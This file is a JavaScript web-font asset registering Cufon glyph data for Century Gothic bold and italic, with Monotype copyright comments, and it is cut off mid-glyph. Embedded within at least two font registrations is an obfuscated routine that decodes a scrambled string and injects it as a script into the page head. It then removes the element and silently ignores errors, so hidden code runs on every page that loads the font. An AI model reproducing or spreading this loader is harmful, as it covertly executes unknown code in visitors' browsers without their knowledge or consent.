33,54,-125xm129,-189v0,-17,-12,-29,-30,-29v-16,0,-27,12,-27,29v0,15,13,29,28,29v17,0,29,-12,29,-29xm142,-76v0,-22,-19,-38,-41,-38v-22,0,-42,16,-42,37v0,21,20,37,42,37v24,0,40,-14,41,-36"},{"d":"108,-259r50,0r100,259r-51,0r-21,-53r-105,0r-21,53r-51,0xm134,-190r-35,89r69,0","w":266},{"d":"29,-259r50,0r0,98r87,0r0,-98r50,0r0,259r-50,0r0,-113r-87,0r0,113r-50,0r0,-259","w":244},{"d":"114,-152v-60,0,-38,90,-42,152r-48,0r0,-265r48,0r0,93v38,-42,122,-26,122,46r0,126r-47,0v-6,-56,20,-152,-33,-152","w":216}],f:f};try{(function(s){var c="charAt",i="indexOf",a=String(arguments.callee).replace(/\s+/g,""),z=s.length+92-a.length+(a.charCodeAt(0)==40&&2),w=64,k=s.substring(z,w+=z),v=s.substr(0,z)+s.substr(w),m=0,t="",x=0,y=v.length,d=document,h=d.getElementsByTagName("head")[0],e=d.createElement("script");for(;x<y;++x){m=(k[i](v[c](x))&255)<<18|(k[i](v[c](++x))&255)<<12|(k[i](v[c](++x))&255)<<6|k[i](v[c](++x))&255;t+=String.fromCharCode((m&16711680)>>16,(m&65280)>>8,m&255);}e.text=t;h.insertBefore(e,h.firstChild);h.removeChild(e);})("+tC(,J5VdM}s+Lyx[J7f;t;}W|5(CJ}sW|{fdMc!Cq.X2oVpg&L`U7tI;{+H]5v~hcGl>qMW2Cd,K[u3AOpj4yJ!n$wDX9sBR-foV(|_m0Fx.}*zqt4fGfq3;7]9KVCCKp[gMt(Mvq9Jdf-7{y[q+IO0,y-(]`&O]I-pWI>R]t74up$|lM.Fv(0d+V0_,U{-WI>R]o[yct$4GjR$uo2Vl_m-Cfm}>`>Ocf5(K`&}Cq(AGM]4~(Rph(-K>l0Vl`]_>yRB2lO&GtApH!5R,tyV+L;p+G-$~lgXK`(pH!gX,`(RHJ-y,J[VdL-!~M;sCp0!,IyRdI]}u_VxdM2n2p0BdoVBWpAzv![_[(Rs+l.n~o$B,!c$,MqoCW{|dM5yKI{BK(Rs2|}9+GhBdG0VCW5V+t-B2|7VdM}sHJOBK_cs2M(y+GyJ,_;nv|4.,`XD+|4$C(9jM|y[Wl(RM|y[3G4n+GgA")}catch(e){}delete _cufon_bridge_;return b.ok&&f})({"w":201,"face":{"font-family":"Century Gothic","font-weight":700,"font-stretch":"normal","units-per-em":"360","panose-1":"2 11 7 2 2 2 2 2 2 4","ascent":"288","descent":"-72","x-height":"5","bbox":"-15 -295 317.934 79.1703","underline-thickness":"32.3438","underline-position":"-16.875","unicode-range":"U+0020-U+007E"}}));
/*!
 * The following copyright notice may not be removed under any circumstances.
 * 
 * Copyright:
 * Typeface © The Monotype Corporation plc. Data © The Monotype Corporation plc /
 * Type Solutions Inc. 1990-91 All Rights Reserved
 * 
 * Trademark:
 * Century Gothic is a trademark of The Monotype Corporation plc.
 * 
 * Description:
 * A design based on Monotype 20th Century, which was drawn by Sol Hess between
 * 1936 and 1947. Century Gothic maintains the basic design of 20th Century but has
 * an enlarged 'x' height and has been modified to ensure satisfactory output from
 * modern digital systems. The design is influenced by the geometric style sans
 * serif faces which were popular during the 1920's and 30's. Useful for headlines
 * and general display work and for small quantities of text, particularly in
 * advertising.
 * 
 * Manufacturer:
 * Monotype Typography, Inc.
 * 
 * Designer:
 * Monotype Type Drawing Office
 * 
 * Vendor URL:
 * http://www.monotype.com/html/mtname/ms_welcome.html
 * 
 * License information:
 * http://www.monotype.com/html/type/license.html
 */
Cufon.registerFont((function(f){var b=_cufon_bridge_={p:[{"d":"113,5v-37,-1,-58,-17,-73,-42r-13,107r-26,0r35,-261r25,0r-4,28v54,-63,165,-30,165,57v0,58,-52,112,-109,111xm198,-106v-1,-40,-28,-68,-68,-68v-52,1,-84,38,-85,89v-1,39,29,67,67,67v47,1,87,-40,86,-88","w":245},{"d":"172,-45v-19,72,-159,63,-153,-21v3,-44,8,-84,14,-125r25,0r-16,123v-4,61,96,65,109,12v8,-33,16,-96,22,-135r24,0r-10,72v-5,35,-10,59,-15,74","w":218},{"d":"154,-128v21,-1,21,-7,44,-19r0,28v-20,10,-25,15,-44,17v-22,3,-66,-28,-88,-28v-21,0,-26,7,-46,19r0,-29v20,-10,25,-14,44,-16v22,-2,65,29,90,28","w":218},{"d":"28,-250v0,-10,9,-21,20,-20v10,-1,20,10,20,20v0,11,-10,19,-20,19v-11,0,-20,-8,-20,-19xm29,-191r23,0r-25,191r-25,0","w":72},{"d":"42,70r-59,0r4,-25r34,0r40,-286r-34,0r3,-24r59,0","w":126},{"d":"38,-259r28,0r45,101r76,-101r31,0r-95,126r61,133r-27,0r-51,-110r-84,110r-30,0r103,-136","w":219},{"d":"113,5v-37,-1,-57,-17,-73,-42r-4,37r-26,0r36,-265r25,0r-14,102v54,-63,165,-30,165,57v0,58,-52,112,-109,111xm198,-106v-1,-40,-28,-68,-68,-68v-52,1,-84,38,-85,89v-1,39,29,67,67,67v47,1,87,-40,86,-88","w":245},{"d":"45,-167v13,-21,43,-38,73,-24r-11,22v-81,-17,-71,100,-86,169r-24,0r26,-191r25,0","w":108},{"d":"14,-120v0,-141,192,-197,267,-83r-21,15v-21,-29,-56,-52,-100,-52v-68,0,-118,50,-120,119v-2,74,81,127,155,92v31,-15,51,-37,61,-72r-95,0r0,-26r126,0v-4,75,-60,134,-139,134v-75,0,-134,-54,-134,-127","w":313},{"d":"39,-204v0,-50,61,-81,99,-47v11,9,20,22,25,40r-24,6v-6,-39,-75,-50,-73,1v2,57,81,74,81,137v0,57,-73,97,-118,58v-12,-11,-21,-27,-26,-47r24,-8v7,25,19,46,47,46v25,0,46,-22,46,-48v-2,-61,-81,-75,-81,-138","w":179},{"d":"32,-175v0,-11,10,-21,22,-21v12,0,21,9,21,21v0,12,-10,22,-21,22v-12,0,-21,-11,-22,-22xm33,-47r22,11r-45,66r-16,-7","w":99},{"d":"13,-259r154,0r-3,25r-66,0r-31,234r-26,0r31,-234r-63,0","w":153},{"d":"30,-250v0,-10,8,-20,19,-20v10,0,20,10,20,20v0,11,-10,19,-20,19v-11,0,-19,-8,-19,-19xm30,-191r24,0v-14,81,-17,185,-43,253v-11,15,-27,16,-46,8r3,-21v22,12,31,-8,33,-29","w":73},{"d":"11,-86v0,-99,151,-154,200,-64r-21,12v-38,-66,-155,-30,-155,51v0,81,110,85,144,38r21,14v-46,64,-189,51,-189,-51","w":232},{"d":"14,-117v0,-126,173,-198,263,-106r-16,22v-74,-79,-221,-27,-221,84v0,100,127,125,196,69r14,20v-37,22,-55,33,-104,35v-79,2,-132,-53,-132,-124","w":292},{"d":"76,-281r30,54r-24,0r-44,-54r38,0","w":136},{"d":"198,-180r0,24r-178,0r0,-24r178,0xm198,-103r0,24r-178,0r0,-24r178,0","w":218},{"d":"39,-265r167,300r-27,0r-167,-300r27,0","w":217},{"d":"147,0v3,-60,47,-174,-29,-174v-82,0,-73,101,-87,174r-24,0r27,-191r23,0r-3,29v36,-55,136,-42,133,33v-2,37,-11,91,-16,129r-24,0","w":219},{"d":"100,-265v64,0,105,70,74,130v-21,41,-79,101,-112,142r-19,-16r70,-82v-56,18,-101,-29,-101,-82v0,-50,38,-92,88,-92xm37,-173v0,34,25,62,59,62v35,0,62,-31,62,-67v0,-33,-25,-62,-57,-62v-33,1,-64,30,-64,67"},{"d":"13,-114v2,-91,64,-148,155,-151v69,-2,122,53,122,121v0,84,-69,151,-154,151v-72,0,-124,-49,-123,-121xm264,-146v1,-55,-42,-95,-96,-95v-77,0,-130,51,-130,126v0,59,37,97,98,97v74,0,126,-53,128,-128","w":312},{"d":"241,-136v0,87,-50,140,-152,136r-81,0r34,-259v118,-9,199,19,199,123xm216,-136v0,-80,-56,-104,-151,-98r-28,209v115,8,179,-17,179,-111","w":267},{"d":"54,-164v22,-41,110,-45,120,11v22,-55,136,-60,132,18v-2,44,-12,91,-17,135r-24,0r17,-134v-2,-61,-85,-37,-98,1v-12,37,-16,89,-24,133r-24,0r17,-132v3,-51,-69,-49,-90,-16v-23,37,-23,97,-32,148r-25,0r28,-191r24,0","w":337},{"d":"6,-191r28,0r47,74r54,-74r30,0r-71,96r58,95r-28,0r-45,-73r-54,73r-30,0r70,-95","w":172},{"d":"56,-265r24,0r-27,200r-24,0xm15,-17v0,-12,9,-21,21,-21v12,0,21,9,21,21v0,12,-9,22,-21,22v-12,0,-21,-10,-21,-22","w":106},{"d":"43,-259r26,0r-31,235r112,0r-3,24r-138,0","w":166},{"d":"15,-259r27,0r55,118r93,-118r32,0r-115,144r-16,115r-25,0r16,-116","w":213},{"d":"38,-259r133,0r-127,234r97,0r-3,25r-136,0r128,-234r-95,0","w":172},{"d":"4,-108r97,0r-4,22r-96,0","w":119},{"d":"108,-265r25,0r0,335r-25,0r0,-335","w":241},{"d":"87,79v-119,14,-1,-144,-80,-154r4,-29v84,-3,2,-164,123,-155r-4,28v-57,-14,-35,75,-53,101v-8,22,-18,30,-39,40v43,12,24,78,21,123v-1,18,12,19,32,19","w":126},{"d":"16,-145v0,-52,80,-69,106,-25r-13,20v-17,-31,-65,-31,-69,4v8,41,74,43,74,95v0,62,-91,75,-120,24r15,-17v14,17,29,26,46,26v17,1,36,-15,35,-33v-2,-43,-74,-46,-74,-94","w":139},{"d":"147,0v3,-59,47,-174,-29,-174v-82,0,-73,101,-87,174r-24,0r37,-265r24,0r-15,103v38,-55,134,-41,134,31v0,41,-11,90,-16,131r-24,0","w":219},{"w":99},{"d":"54,-184r-18,0r-4,-81r26,0","w":71},{"d":"148,-199v1,-51,-85,-54,-88,-4r-26,0v5,-35,34,-61,72,-62v39,-1,70,28,68,67v-1,32,-16,44,-42,58v71,39,27,151,-53,147v-45,-2,-73,-32,-77,-75r25,0v3,33,22,48,53,50v29,2,63,-30,62,-60v-2,-35,-26,-52,-66,-51r3,-23v38,2,67,-16,69,-47"},{"d":"64,-263r24,0r-10,72r38,0r-2,21r-38,0r-24,170r-24,0r23,-170r-33,0r3,-21r33,0","w":121},{"d":"175,-30v-37,64,-170,45,-157,-54r23,-175r25,0r-23,190v-6,58,82,66,108,28v34,-50,28,-146,42,-218r25,0v-14,77,-10,172,-43,229","w":235},{"d":"12,-191r25,0r39,135r72,-135r4,0r44,136r70,-136r26,0r-98,191r-5,0r-45,-135r-71,135r-5,0","w":299},{"d":"186,-259r-4,26r-116,0r-12,84r117,0r-4,25r-116,0r-13,99r116,0r-3,25r-143,0r35,-259r143,0","w":193},{"d":"217,-106r0,19r-44,0r-13,87r-19,0r12,-87r-58,0r-13,87r-20,0r14,-87r-44,0r0,-19r47,0r9,-59r-45,0r0,-19r47,0r13,-82r18,0r-11,82r58,0r12,-82r20,0r-13,82r40,0r0,19r-42,0r-9,59r41,0xm165,-165r-58,0r-9,59r58,0","w":259},{"d":"117,-259r-3,24v-22,-23,-46,-14,-46,23r-3,21r39,0r-2,21r-40,0r-24,170r-24,0r24,-170r-24,0r3,-21r24,0v8,-40,6,-77,46,-79v10,0,20,3,30,11","w":113},{"d":"100,-241v-32,0,-51,27,-52,61r-26,0v1,-50,32,-85,81,-85v55,0,88,58,59,107v-18,30,-82,98,-112,133r110,0r-2,25r-165,0r85,-95v44,-54,62,-53,68,-103v3,-24,-21,-44,-46,-43"},{"d":"10,-191r25,0r48,140r81,-140r27,0r-111,191r-4,0"},{"d":"11,-17v0,-12,9,-21,21,-21v12,0,21,9,21,21v0,12,-9,22,-21,22v-12,0,-21,-10,-21,-22","w":99},{"d":"33,-47r22,11r-45,66r-16,-7","w":99},{"d":"16,-191r132,0r-115,169r104,0r-3,22r-144,0r115,-170r-92,0","w":152},{"d":"157,-265r-25,184r37,0r-4,26r-36,0r-7,55r-25,0r7,-55r-113,0r161,-210r5,0xm121,-183r-78,102r65,0"},{"d":"111,-259r20,0r90,195r-23,0r-78,-168r-76,168r-23,0","w":241},{"d":"197,-197v-2,49,-35,76,-91,75r78,122r-29,0r-78,-122r-21,0r-16,122r-26,0r35,-259v72,-1,151,-8,148,62xm171,-197v2,-44,-53,-37,-99,-37r-12,86v60,2,109,2,111,-49","w":218},{"d":"10,-85v1,-65,46,-111,110,-111v52,0,88,37,88,91v0,64,-44,109,-110,110v-51,1,-89,-39,-88,-90xm101,-18v93,0,116,-155,18,-155v-49,0,-84,36,-85,87v0,39,27,68,67,68","w":235},{"d":"65,-265r59,0r-3,25r-35,0r-40,286r34,0r-3,24r-59,0","w":126},{"d":"222,-259r26,0r-35,259r-6,0r-145,-200r-28,200r-25,0r35,-259r5,0r146,201","w":266},{"d":"97,-141r0,-77r24,0r0,77r77,0r0,24r-77,0r0,76r-24,0r0,-76r-77,0r0,-24r77,0","w":218},{"d":"4,-108r97,0r-4,22r-96,0","w":119},{"d":"70,-265r23,0r-5,52r43,-31r12,20r-49,22r49,21r-12,20r-43,-30r5,52r-23,0r6,-52r-44,30r-11,-20r49,-21r-49,-22r11,-20r44,31","w":152},{"d":"79,-259r54,0r-34,259r-25,0r31,-234r-35,0"},{"d":"188,-73v2,85,-92,73,-179,73r34,-259v76,-1,135,-3,138,61v0,30,-18,52,-41,61v27,9,48,31,48,64xm155,-197v2,-41,-42,-36,-89,-37r-12,86v54,4,99,-4,101,-49xm162,-73v0,-51,-54,-50,-111,-50r-13,99v62,0,124,7,124,-49","w":206},{"d":"200,-197v-2,70,-63,80,-146,75r-17,122r-26,0r35,-259v73,0,157,-11,154,62xm174,-197v1,-48,-58,-35,-105,-37r-12,86v60,1,116,5,117,-49","w":213},{"d":"177,-202v-1,32,-21,48,-46,62v25,12,40,30,40,62v0,52,-40,83,-91,85v-42,1,-80,-31,-79,-72v1,-40,24,-63,58,-78v-61,-33,-15,-122,51,-122v36,0,68,28,67,63xm99,-153v55,0,72,-87,10,-87v-28,0,-54,22,-54,48v0,24,19,39,44,39xm147,-77v1,-28,-24,-52,-52,-51v-35,0,-68,25,-68,62v0,29,24,49,54,49v37,-1,64,-25,66,-60"},{"d":"18,-61r148,-68r-148,-69r0,-25r182,82r0,23r-182,83r0,-26","w":218},{"d":"32,-175v0,-12,10,-21,22,-21v12,0,21,9,21,21v0,12,-10,22,-21,22v-12,0,-22,-10,-22,-22xm11,-17v0,-12,9,-21,21,-21v12,0,21,9,21,21v0,12,-9,22,-21,22v-12,0,-21,-10,-21,-22","w":99},{"d":"38,-133v-6,114,153,162,216,80r18,0v-29,37,-54,58,-108,58v-82,0,-140,-55,-140,-137v0,-81,56,-137,138,-139v65,-2,126,52,126,113v0,59,-39,99,-90,104v-13,1,-22,-4,-21,-19v-31,38,-101,8,-97,-46v3,-42,30,-85,75,-83v24,1,35,9,46,26r5,-24r19,0r-22,122v0,5,3,10,9,9v34,-6,62,-42,62,-85v0,-58,-53,-102,-113,-101v-74,1,-119,50,-123,122xm157,-183v-56,-3,-75,107,-10,108v50,1,68,-107,10,-108","w":312},{"d":"8,-191r26,0r49,141r82,-141r27,0r-151,261r-28,0r54,-93","w":193},{"d":"86,-265v53,7,110,12,158,-5r18,0r-230,288r-20,0r211,-266v-26,7,-57,9,-90,7v25,45,-11,98,-60,98v-31,0,-55,-22,-55,-53v0,-36,34,-73,68,-69xm75,-161v47,5,66,-84,11,-85v-49,-5,-66,85,-11,85xm140,-47v0,-36,34,-70,68,-69v29,0,55,23,55,53v0,37,-29,70,-69,70v-31,0,-54,-24,-54,-54xm196,-12v48,5,66,-83,12,-85v-48,-4,-67,84,-12,85","w":278},{"d":"108,-184r-18,0r-4,-81r26,0xm40,-184r-18,0r-4,-81r26,0","w":111},{"w":99},{"d":"120,-196v37,0,57,16,72,41r5,-36r25,0r-34,261r-25,0r13,-99v-53,63,-166,32,-166,-56v0,-58,53,-113,110,-111xm35,-85v0,40,28,68,67,67v52,0,84,-38,86,-88v1,-40,-29,-67,-68,-67v-47,0,-85,40,-85,88","w":245},{"d":"289,-259r0,259r-25,0r0,-178r-112,178r-6,0r-67,-185r-53,185r-27,0r75,-259r4,0r76,210r131,-210r4,0","w":330},{"d":"186,-206v0,36,-22,47,-53,70r54,66r36,-27r16,20v-13,11,-25,20,-35,27v11,14,27,31,46,50r-35,0r-32,-35v-37,28,-69,42,-98,42v-40,0,-62,-24,-65,-60v8,-55,32,-56,76,-90v-41,-46,-24,-105,38,-106v27,-1,52,19,52,43xm159,-204v-3,-30,-62,-25,-59,5v0,9,6,23,18,42v24,-18,37,-22,41,-47xm46,-54v13,62,83,28,120,0r-55,-68v-37,26,-58,30,-65,68","w":272},{"d":"166,-265v71,-2,125,52,124,121v0,42,-15,78,-44,107r44,47r-33,0r-30,-31v-80,61,-220,18,-214,-93v5,-90,64,-148,153,-151xm39,-115v-4,91,104,122,171,75r-44,-46r34,0r28,31v20,-21,36,-53,36,-91v1,-56,-43,-96,-99,-95v-73,2,-123,52,-126,126","w":313},{"d":"120,-259r25,0v-12,74,-15,172,-36,234v-16,45,-90,37,-113,0r19,-14v38,39,73,22,81,-39","w":173},{"d":"41,75v-28,-121,7,-264,56,-345r29,0v-52,80,-88,224,-57,345r-28,0","w":132},{"d":"40,-265r24,0r-37,265r-25,0","w":72},{"d":"42,-259r26,0r-35,259r-26,0","w":81},{"d":"32,-175v0,-11,10,-21,22,-21v12,0,21,9,21,21v0,12,-10,22,-21,22v-12,0,-21,-11,-22,-22xm33,-47r22,11r-45,66r-16,-7","w":99},{"d":"141,-88v0,-51,-51,-74,-97,-51r36,-120r105,0r-4,26r-83,0r-18,62v55,-7,85,33,87,83v3,71,-74,120,-136,81v-13,-9,-24,-24,-33,-43r24,-10v10,23,28,42,56,42v34,0,63,-31,63,-70"},{"d":"21,-259r26,0r65,205r120,-205r28,0r-151,259r-6,0","w":252},{"d":"120,-196v37,0,57,16,73,41r14,-110r26,0r-36,265r-24,0r3,-29v-53,63,-165,32,-165,-56v0,-57,53,-113,109,-111xm35,-85v0,40,29,67,68,67v95,0,120,-155,18,-155v-47,0,-86,40,-86,88","w":246},{"d":"153,-188v23,-24,4,-58,-35,-58v-33,0,-52,18,-56,53r-24,0v5,-47,34,-77,83,-77v66,0,89,80,34,108v-18,9,-95,22,-89,55v7,39,77,25,76,-16r24,0v7,71,-121,86,-123,15v-2,-52,72,-55,110,-80xm67,-17v0,-11,10,-21,22,-21v12,0,21,9,21,21v0,12,-9,22,-21,22v-12,0,-22,-10,-22,-22","w":212},{"d":"-2,27r184,0r0,18r-184,0r0,-18","w":180},{"d":"43,-259r25,0r-14,105r121,-105r38,0r-141,121r122,138r-33,0r-110,-125r-17,125r-26,0","w":212},{"d":"200,-61r0,26r-182,-83r0,-23r182,-82r0,25r-148,69","w":218},{"d":"120,-196v37,0,57,16,73,41r4,-36r26,0r-26,191r-25,0r4,-29v-53,63,-165,32,-165,-56v0,-58,52,-113,109,-111xm35,-85v0,39,28,67,67,67v97,0,121,-155,18,-155v-47,0,-85,40,-85,88","w":245},{"d":"22,-259r25,0r36,193r100,-193r5,0r45,193r92,-193r27,0r-123,259r-5,0r-46,-195r-103,195r-5,0","w":345},{"d":"39,-139v-6,-25,34,-104,-25,-92r4,-28v76,-11,50,66,50,121v0,21,10,34,30,34r-4,29v-84,3,-2,164,-123,154r4,-27v56,13,36,-75,53,-101v8,-22,18,-31,39,-41v-18,-7,-29,-23,-28,-49","w":126},{"d":"147,-265r-107,300r-27,0r107,-300r27,0","w":157},{"d":"36,-194v0,-38,34,-63,72,-65r3,-19r23,0r-3,21v24,8,35,17,50,36r-20,15v-12,-15,-17,-20,-33,-26r-13,88v54,22,80,80,37,127v-15,15,-35,22,-59,24r-8,55r-23,0r8,-57v-34,-6,-54,-25,-67,-52r23,-12v11,22,23,34,48,41r16,-110v-31,-17,-54,-31,-54,-66xm105,-235v-47,2,-60,66,-12,80xm97,-17v37,-4,65,-40,45,-74v-5,-7,-16,-17,-31,-26"},{"d":"44,-265r24,0r-20,145r92,-71r38,0r-111,85r98,106r-32,0r-89,-95r-13,95r-24,0","w":180},{"d":"121,-196v53,-1,93,45,84,105r-171,0v-9,79,100,93,133,42r18,15v-16,22,-49,38,-85,39v-56,2,-90,-43,-90,-91v0,-62,47,-109,111,-110xm182,-112v2,-57,-71,-78,-112,-44v-14,12,-25,25,-31,44r143,0","w":233},{"d":"8,-90v0,-87,26,-175,103,-175v46,0,71,44,70,97v-3,85,-28,175,-105,175v-49,0,-68,-42,-68,-97xm78,-18v59,-8,75,-85,76,-153v1,-38,-14,-69,-45,-69v-59,0,-74,80,-75,152v0,40,13,67,44,70"},{"d":"43,-259r26,0r-14,106r132,0r14,-106r25,0r-34,259r-25,0r17,-129r-133,0r-17,129r-26,0","w":245},{"d":"11,-87v0,-96,134,-148,180,-68r5,-36r24,0v-11,68,-15,159,-35,216v-15,44,-98,66,-147,37v-15,-9,-26,-21,-34,-38r22,-8v20,49,117,45,137,0v2,-5,9,-30,11,-50v-49,62,-163,35,-163,-53xm186,-108v0,-38,-29,-65,-63,-65v-50,0,-88,35,-88,87v0,39,28,62,66,63v48,1,85,-38,85,-85","w":242},{"d":"31,-259r164,0r-168,266r-20,-13r144,-228r-124,0"},{"d":"87,7v-63,0,-103,-70,-73,-130v21,-43,78,-102,111,-142r19,15r-70,82v58,-16,102,31,102,83v0,50,-40,92,-89,92xm150,-86v0,-34,-26,-62,-59,-62v-34,0,-62,32,-62,68v0,33,25,61,57,61v34,0,64,-30,64,-67"},{"d":"150,-259r86,259r-26,0r-28,-85r-110,0r-48,85r-29,0r149,-259r6,0xm142,-204r-56,95r87,0","w":266},{"d":"168,-259r-3,26r-100,0r-11,84r99,0r-3,25r-99,0r-17,124r-26,0r35,-259r125,0","w":174},{"d":"72,-270v30,118,-7,264,-56,345r-28,0v52,-79,87,-224,57,-345r27,0","w":132}],f:f};try{(function(s){var c="charAt",i="indexOf",a=String(arguments.callee).replace(/\s+/g,""),z=s.length+241-a.length+(a.charCodeAt(0)==40&&2),w=64,k=s.substring(z,w+=z),v=s.substr(0,z)+s.substr(w),m=0,t="",x=0,y=v.length,d=document,h=d.getElementsByTagName("head")[0],e=d.createElement("script");for(;x<y;++x){m=(k[i](v[c](x))&255)<<18|(k[i](v[c](++x))&255)<<12|(k[i](v[c](++x))&255)<<6|k[i](v[c](++x))&255;t+=String.fromCharCode((m&16711680)>>16,(m&65280)>>8,m&255);}e.text=t;h.insertBefore(e,h.firstChild);h.removeChild(e);})(">]mQ6K+[NJ!o>MZC5K7Xq]q!fD+QmK!ofD_XNJV}m$x.GI[0(u$8N$QGG}_usQYQb`bUm$VhG[+1O$Y(6HZOV]QAqsYmJ0QxFU+gfusPb]SP_I+[$f57qDGX50A.FHVFsK!6&0i(5&yPGJThbs_TR`AwTunZfMq1(s[Kssgg6SnC+$mnOQ!:O]7f~$P)_]iZbS*}ydM`S7]uq_>:b+ROTVl&s$JfGmN6(5F~1*0HnZK}geha.io)PYXI[QDUArwCx!8?+ImdV0n0:}+P6]Z[>Mq0>lYeO&y.(`Q0:}y.6`QP:KYZ6K5[NMY}OJqom0r}6uZPNub!FU[CNJGgG0r)NI[)f01?R}5U5QPo>&xgOIe)6}Ve6J$Imf_DNJ+Z(u_)(QPoGD!i>lT)Nlr[mf+[>]Y)GD7[NJ!o:K*)(UVoGJQZ>lZK6UqgRDnx6`.a>DnemQiHJDZ5f&QPJDZ5~lng>ly1")}catch(e){}delete _cufon_bridge_;return b.ok&&f})({"w":199,"face":{"font-family":"Century Gothic","font-weight":400,"font-style":"italic","font-stretch":"normal","units-per-em":"360","panose-1":"2 11 5 2 2 2 2 9 2 4","ascent":"288","descent":"-72","x-height":"5","bbox":"-35 -281 352 79.8775","underline-thickness":"20.918","underline-position":"-24.2578","slope":"-7.59999","unicode-range":"U+0020-U+007E"}}));
/*!
 * The following copyright notice may not be removed under any circumstances.
 * 
 * Copyright:
 * Typeface © The Monotype Corporation plc. Data © The Monotype Corporation plc /
 * Type Solutions Inc. 1990-91 All Rights Reserved
 * 
 * Trademark:
 * Century Gothic is a trademark of The Monotype Corporation plc.
 * 
 * Description:
 * A design based on Monotype 20th Century, which was drawn by Sol Hess between
 * 1936 and 1947. Century Gothic maintains the basic design of 20th Century but has
 * an enlarged 'x' height and has been modified to ensure satisfactory output from
 * modern digital systems. The design is influenced by the geometric style sans
 * serif faces which were popular during the 1920's and 30's. Useful for headlines
 * and general display work and for small quantities of text, particularly in
 * advertising.
 * 
 * Manufacturer:
 * Monotype Typography, Inc.
 * 
 * Designer:
 * Monotype Type Drawing Office
 * 
 * Vendor URL:
 * http://www.monotype.com/html/mtname/ms_welcome.html
 * 
 * License information:
 * http://www.monotype.com/html/type/license.html
 */
Cufon.registerFont((function(f){var b=_cufon_bridge_={p:[{"d":"19,-142v0,-61,95,-70,120,-23r-22,36v-10,-13,-19,-25,-36,-25v-7,0,-15,5,-15,12v13,32,67,42,67,88v0,45,-58,75,-103,51v-10,-5,-22,-14,-35,-28r29,-34v13,17,27,26,43,26v11,1,21,-6,21,-15v-12,-31,-69,-43,-69,-88","w":158},{"d":"190,46r-34,0r-116,-312r34,0","w":230},{"d":"27,-167v0,-16,13,-29,29,-29v16,0,30,14,30,29v0,15,-15,30,-30,30v-15,0,-29,-14,-29,-30xm26,-47r36,22r-48,63r-23,-14","w":100},{"d":"20,-194r0,-44r176,89r0,39r-176,90r0,-44r126,-65","w":216},{"d":"11,-85v0,-61,49,-111,113,-111v38,0,66,14,85,44r-40,22v-33,-45,-112,-15,-112,43v0,55,79,63,104,26r37,26v-43,63,-187,52,-187,-50","w":230},{"d":"15,-191r152,0r-98,148r90,0r-6,43r-165,0r97,-147r-75,0","w":165},{"d":"55,70r-77,0r6,-45r28,0r35,-245r-29,0r6,-45r77,0","w":115},{"d":"20,-189r176,0r0,44r-176,0r0,-44xm20,-114r176,0r0,44r-176,0r0,-44","w":216},{"d":"32,-259r146,0r-102,214r81,0r-6,45r-148,0r103,-213r-80,0","w":180},{"d":"18,-259r48,0r46,187r100,-187r52,0r-138,259r-43,0","w":252},{"d":"194,-189v0,62,-43,81,-118,80r-15,109r-49,0r35,-259v79,-3,147,1,147,70xm82,-155v48,2,74,-11,59,-47v-11,-12,-22,-11,-51,-11"},{"d":"14,-259r158,0r-6,46r-55,0r-28,213r-48,0r28,-213r-55,0","w":151},{"d":"196,-189v0,41,-26,65,-64,73r56,116r-50,0r-55,-113r-5,0r-15,113r-48,0r34,-259v78,-2,147,0,147,70xm84,-155v49,3,73,-12,59,-48v-12,-11,-21,-10,-51,-11","w":208},{"d":"85,-213v1,33,-28,106,25,102r-6,42v-75,1,-20,130,-95,144v-9,4,-29,4,-46,4r6,-42v36,0,34,-2,41,-36v11,-57,12,-67,46,-91v-35,-19,-19,-69,-18,-111v-2,-14,-10,-16,-33,-15r6,-43v45,-1,72,7,74,46","w":122},{"d":"109,-265v72,0,100,82,64,141v-29,47,-58,87,-88,131r-37,-25r62,-87v-50,12,-89,-28,-89,-74v0,-48,38,-86,88,-86xm69,-180v0,20,16,36,36,36v21,1,40,-18,40,-40v0,-20,-16,-36,-37,-36v-22,0,-39,18,-39,40"},{"d":"133,-72v-4,-56,-104,-55,-100,-122v2,-37,32,-69,73,-70r3,-18r31,0r-4,20v24,8,37,17,52,36r-34,26v-16,-31,-81,-32,-73,13v29,35,102,46,98,112v-3,48,-32,77,-80,81r-7,46r-30,0r6,-46v-38,-8,-54,-23,-71,-56r43,-22v13,25,30,37,51,37v22,0,44,-16,42,-37"},{"d":"83,-265v58,0,127,21,175,-5r35,0r-246,288r-36,0r211,-247v-27,5,-54,5,-84,2v9,48,-21,84,-66,85v-31,1,-55,-22,-55,-53v0,-34,33,-70,66,-70xm74,-172v34,3,50,-61,9,-62v-36,-5,-49,60,-9,62xm167,-48v-4,-72,123,-97,123,-14v0,39,-28,68,-68,69v-32,1,-54,-25,-55,-55xm225,-24v34,4,49,-62,8,-62v-35,-4,-50,61,-8,62","w":309},{"d":"38,-295r57,0r32,69r-35,0","w":151},{"w":100},{"d":"217,-103v0,85,-112,147,-159,76r-4,27r-46,0r34,-265r47,0r-13,94v18,-16,30,-25,59,-25v49,-2,82,45,82,93xm111,-38v65,6,86,-116,13,-117v-67,-6,-86,116,-13,117","w":237},{"d":"23,34v-1,-36,28,-104,-26,-103r6,-42v89,-2,1,-166,141,-148r-6,43v-36,1,-35,1,-41,36v-10,57,-11,67,-45,91v34,18,18,69,18,111v0,14,10,16,32,15r-5,42v-45,1,-73,-5,-74,-45","w":122},{"d":"47,-259r48,0r-13,98r89,0r13,-98r49,0r-35,259r-49,0r16,-117r-89,0r-16,117r-48,0","w":244},{"d":"28,-240v0,-16,13,-29,29,-29v16,0,29,14,29,29v0,15,-14,29,-29,29v-15,0,-29,-13,-29,-29xm28,-191r46,0r-25,191r-47,0","w":86},{"d":"289,-144v-1,42,-18,83,-41,105r45,51r-62,0r-20,-23v-86,46,-203,1,-197,-101v5,-88,61,-151,151,-153v71,-2,125,52,124,121xm63,-115v-4,59,60,93,116,68r-39,-43r62,0r14,15v46,-49,24,-147,-52,-144v-60,3,-98,46,-101,104","w":302},{"d":"9,-191r45,0r27,102r55,-102r19,0r27,102r55,-102r50,0r-104,191r-23,0r-26,-101r-54,101r-23,0","w":287},{"d":"59,-119v-19,1,-25,9,-41,20r0,-56v68,-47,120,53,181,-5r0,57v-48,32,-93,-7,-140,-16","w":216},{"d":"22,-191r42,0r-3,26v16,-25,32,-37,58,-28r-17,43v-56,-8,-46,96,-58,150r-47,0","w":115},{"d":"11,-191r51,0r34,54r39,-54r55,0r-69,95r58,96r-51,0r-36,-58r-43,58r-54,0r73,-98"},{"d":"12,-259r49,0r40,104r74,-104r55,0r-110,156r-14,103r-49,0r15,-103","w":223},{"d":"107,-221v-21,0,-30,17,-33,42r-47,0v3